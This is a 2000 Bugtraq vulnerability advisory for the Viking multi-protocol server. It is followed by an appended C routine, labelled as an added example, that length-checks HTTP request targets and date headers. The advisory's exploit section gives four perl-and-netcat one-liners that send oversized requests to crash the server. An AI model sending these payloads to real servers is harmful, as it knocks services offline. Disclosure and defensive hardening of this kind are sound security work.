[16419] in bugtraq
[NT] Viking security vulnerabilities enable remote code execution
daemon@ATHENA.MIT.EDU (Aviram Jenik)
Mon Aug 28 15:45:15 2000
Message-Id:  <399a01c01122$0d7f2310$0201a8c0@aviram>
Date:         Mon, 28 Aug 2000 20:59:10 +0200
Reply-To: Aviram Jenik <aviram@BEYONDSECURITY.COM>
From: Aviram Jenik <aviram@BEYONDSECURITY.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com
Viking security vulnerabilities enable remote code execution (long URL, date parsing)
--------------------------------------------------------------------------------
SUMMARY
Viking Server <http://www.robtex.com/viking/> is a multi-protocol
Internet server/proxy for Windows 95/NT that supports a wide range of
protocols such as HTTP, FTP, SOCKS, DNS, TELNET, SMTP, POP3, UUCP, FCP,
ICP, etc. Unfortunately, it does not perform proper buffer bounds checking,
enabling attackers to launch a buffer overflow attack and possibly execute
arbitrary code. In addition, incorrect parsing of non-date data causes an
exception, enabling remote attackers to mount a Denial of Service attack
against the product.
DETAILS
Vulnerable systems:
Viking 1.06 build 355 and prior
Immune systems:
Viking 1.06 build 370 and above
Exploit:
Any of the following HTTP commands will crash the server:
(1)
GET [x11765] HTTP/1.1<enter><enter>
(Cmd: perl -e "print \"GET @{['x'x11765]} HTTP/1.1\n\n\""|nc 127.1 80)
(2)
GET / HTTP/1.1<enter>
Unless-Modified-Since: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nUnless-Modified-Since: @{['x'x14765]}\n\n\""|nc 127.1 80)
(3)
GET / HTTP/1.1<enter>
If-Range: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Range: @{['x'x14765]}\n\n\""|nc 127.1 80)
(4)
GET / HTTP/1.1<enter>
If-Modified-Since: [x14765]<enter><enter>
(Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Modified-Since: @{['x'x14765]}\n\n\""|nc 127.1 80)
Patch:
Robtex responded immediately and released a patch that addresses
these issues.
You can download the patch at:
ftp://ftp.robtex.com/robtex/viking/beta/viking.zip
http://www.robtex.com/files/viking/beta/viking.zip
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of
any kind.
In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages.
====================
--
Aviram Jenik
Beyond Security Ltd.
http://www.BeyondSecurity.com
http://www.SecuriTeam.com
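
A defensive counterpart to the four requests in the advisory, added here as an example (it is not code from Viking, Robtex or the advisory): a pre-parse check that bounds the request-target and the values of the three named headers by length, working on pointer and length pairs so nothing is copied into a fixed-size buffer. The names `check_request` and `check_padded` and the limits `MAX_TARGET` and `MAX_VALUE` are assumptions chosen for illustration.

```c
#include <stdlib.h>
#include <string.h>
#include <strings.h>            /* strncasecmp (POSIX) */
#define MAX_TARGET 2048         /* assumed cap on the request-target */
#define MAX_VALUE  64           /* assumed cap; an HTTP-date is 29 bytes */
static const char *const HDRS[] = {     /* headers the advisory names */
    "If-Modified-Since", "Unless-Modified-Since", "If-Range" };

/* Returns 0 to accept, 414 or 400 to reject. buf need not be NUL-terminated. */
int check_request(const char *buf, size_t len) {
    const char *p = buf, *end = buf + len;
    int first = 1;
    while (p < end) {
        const char *nl = memchr(p, '\n', (size_t)(end - p));
        const char *eol = nl ? nl : end, *next = nl ? nl + 1 : end;
        if (eol > p && eol[-1] == '\r') eol--;      /* accept CRLF or bare LF */
        if (first) {            /* METHOD SP request-target SP version */
            const char *sp1 = memchr(p, ' ', (size_t)(eol - p));
            const char *t = sp1 ? sp1 + 1 : eol;
            const char *sp2 = memchr(t, ' ', (size_t)(eol - t));
            if (!sp2) return 400;
            if ((size_t)(sp2 - t) > MAX_TARGET) return 414;
            first = 0;
        } else if (eol == p) {
            break;              /* blank line: end of headers */
        } else {
            const char *colon = memchr(p, ':', (size_t)(eol - p));
            if (!colon) return 400;
            for (size_t i = 0; i < sizeof HDRS / sizeof HDRS[0]; i++) {
                size_t n = strlen(HDRS[i]);
                if ((size_t)(colon - p) == n && !strncasecmp(p, HDRS[i], n)
                    && (size_t)(eol - colon - 1) > MAX_VALUE) return 400;
            }
        }
        p = next;
    }
    return first ? 400 : 0;     /* empty input is rejected */
}

/* Constructed input: pre + n filler bytes + post, run through the check. */
int check_padded(const char *pre, size_t n, const char *post) {
    size_t a = strlen(pre), b = strlen(post);
    char *m = malloc(a + n + b);
    if (!m) return -1;
    memcpy(m, pre, a); memset(m + a, 'x', n); memcpy(m + a + n, post, b);
    int rc = check_request(m, a + n + b);
    free(m); return rc;
}
int main(void) { return check_padded("GET ", 11765, " HTTP/1.1\n\n") == 414 ? 0 : 1; }
```

The check caps length only; it does not validate date syntax, so the date parser behind it must still fail cleanly on non-date values (If-Range may legitimately carry an entity tag).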